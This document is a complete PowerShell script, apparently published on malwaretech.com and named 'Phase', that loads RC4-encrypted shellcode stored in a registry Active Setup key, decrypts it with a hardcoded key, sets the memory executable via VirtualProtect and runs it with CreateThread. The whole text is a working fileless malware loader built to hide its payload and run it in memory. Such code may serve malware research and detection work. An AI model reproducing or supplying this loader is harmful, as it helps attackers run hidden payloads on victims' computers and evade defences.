Phase PowerShell Script

1. # Read And Execute Rc4 Encrypted ShellCode From The Registry
2.  
3. # Set Registry Key
4. $sRegistryKey = 'HKCU:\Software\Microsoft\Active Setup\Installed Components\{72507C54-3577-4830-815B-310007F6135A}';
5.  
6. # Set Key For Key Stream
7. [Byte[]]$bKey = [System.Text.Encoding]::ASCII.GetBytes("Phase");
8.  
9. # Import Native Functions
10. $sCode = @"
11. [DllImport("kernel32.dll")]
12. public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, Byte[] lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
13. [DllImport("kernel32.dll")]
14. public static extern bool VirtualProtect(Byte[] lpAddress, uint dwSize, uint flNewProtect, [Out] IntPtr lpflOldProtect);
15. [DllImport("kernel32.dll")]
16. public static extern uint WaitForSingleObject(IntPtr hHandle, int dwMilliseconds);
17. "@
18.  
19. # Make The Code Recognized By PowerShell
20. $pFunctions = Add-Type -memberDefinition $sCode -Name "Win32" -namespace Win32Functions -passthru
21.  
22. # Declare Shellcode Array
23. [Byte[]]$bShellCode;
24.  
25. # Check Pointer Size To Check If x64
26. if ([IntPtr]::Size -eq 8) {
27.     # Load Encrypted x64 Shellcode From Registry
28.     $bShellCode = (Get-ItemProperty -Path $sRegistryKey -Name Rc4Encoded64).Rc4Encoded64;
29. }else{
30.     # Load Encrypted x86 Shellcode From Registry
31.     $bShellCode = (Get-ItemProperty -Path $sRegistryKey -Name Rc4Encoded32).Rc4Encoded32;
32. }
33.  
34. # Define Byte Arrays That Are The Boxes
35. [Byte[]]$s = New-Object Byte[] 256;
36. [Byte[]]$k = New-Object Byte[] 256;
37.  
38. # Loop from 0 to 255 to fill the boxes
39. for ($i = 0; $i -lt 256; $i++){
40.     # Fill Box S With 0-255
41.     $s[$i] = [Byte]$i;
42.    
43.     # Fill Box K With (0-255)/dwKeyLen
44.     $k[$i] = $bKey[$i % $bKey.Length];
45. }
46.  
47. # Initialize j
48. $j = 0;
49.  
50. # Loop Through All 256 Bytes
51. for ($i = 0; $i -lt 256; $i++){
52.     $j = ($j + $s[$i] + $k[$i]) % 256;
53.    
54.     # Hold Temporary Value Of S[i] For Swapping
55.     $bSwap = $s[$i];
56.    
57.     # Set S[i] With S[j]
58.     $s[$i] = $s[$j];
59.    
60.     # Set S[j] With Old Value Of S[i]
61.     $s[$j] = $bSwap;
62. }
63.  
64. # Initialize i
65. $i = 0;
66.  
67. # Initialize j
68. $j = 0;
69.  
70. # Loop Through The Bytes In The Buffer
71. for ($x = 0; $x -lt $bShellCode.Length; $x++){
72.     # Pseudo-Random Generation Algorithm
73.     $i = ($i + 1) % 256;
74.     $j = ($j + $s[$i]) % 256;
75.    
76.     # Hold Temporary Value Of S[i] For Swapping
77.     $bSwap = $s[$i];
78.    
79.     # Set S[i] With S[j]
80.     $s[$i] = $s[$j];
81.    
82.     # Set S[j] With Old Value Of S[i]
83.     $s[$j] = $bSwap;
84.     [int]$t = ($s[$i] + $s[$j]) % 256;
85.    
86.     # Xor PlainText With KeyStream
87.     $bShellCode[$x] = $bShellCode[$x] -bxor $s[$t];
88. }
89.  
90. # Check What Size We Should Allocate
91. $dwSize = $bShellCode.Length;
92.  
93. # Check Size Of ShellCode
94. if ($dwSize -gt 0x00000000){
95.     # Variable To Hold Old Protection Flags
96.     [Int[]]$dwOldProt = 0x00000000;
97.  
98.     # Get Pointer To $dwOldProt
99.     $pdwOldProt = [System.Runtime.InteropServices.Marshal]::UnsafeAddrOfPinnedArrayElement($dwOldProt,0)
100.  
101.     # Set Read/Write/Execute Flags On ShellCode
102.     if ($pFunctions::VirtualProtect($bShellCode, $dwSize, 0x40, $pdwOldProt)){     
103.         # Create A New Thread To Execute Our ShellCode
104.         $hThread = $pFunctions::CreateThread(0, 0, $bShellCode, 0, 0, 0);
105.        
106.         # Wait For Our Thread
107.         $pFunctions::WaitForSingleObject($hThread, -1);
108.     }
109. }
110.  
111. www.malwaretech.com